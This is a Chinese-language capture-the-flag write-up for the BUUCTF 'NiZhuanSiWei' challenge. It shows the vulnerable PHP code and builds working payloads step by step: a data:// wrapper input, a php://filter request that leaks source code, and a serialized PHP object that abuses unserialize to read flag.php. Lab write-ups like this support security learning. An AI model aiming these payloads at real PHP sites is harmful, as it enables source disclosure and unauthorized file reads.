BUUCTF[ZJCTF 2019]NiZhuanSiWei 1

开启靶场,发现PHP代码,进行代码审计。

 <?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?> 

1,发现要用get方式传入text,file,password三个变量

isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"  “text” 的内容以确定,为"welcome to the zjctf",尝试本地创建一个文件,进行上传。但发现不行。

  看了WP,发现data可以,payload: ?text=data://text/plain,welcome to the zjctf

 data的用法:

  (1)data://text/plain;base64,+(内容的base64加密值)

  (2),data://text/plain,(+原内容)

 2,构造file函数,之前的代码提示了useless.php 文件,使用filter 协议读取文件

  payload: file:file=php://filter/read=convert.base64-encode/resource=useless.php

   解码得到PHP代码

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  //__toString(),类被当成字符串时的回应方法
        if(isset($this->file)){  
            echo file_get_contents($this->file); //file_get_contents() 函数把整个文件读入一个字符串中。
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>  

3,给file赋值为flag.php,因为第一个PHP代码会将password进行一次反序列化,所以在这对password进行序列化输出

  

4,构造payload: password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";} 

最终payload:?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

 

 5,访问源码,发现flag

得到flag 

posted @ 2021-10-12 19:14  LoYoHo00  阅读(99)  评论(0编辑  收藏  举报
levels of contents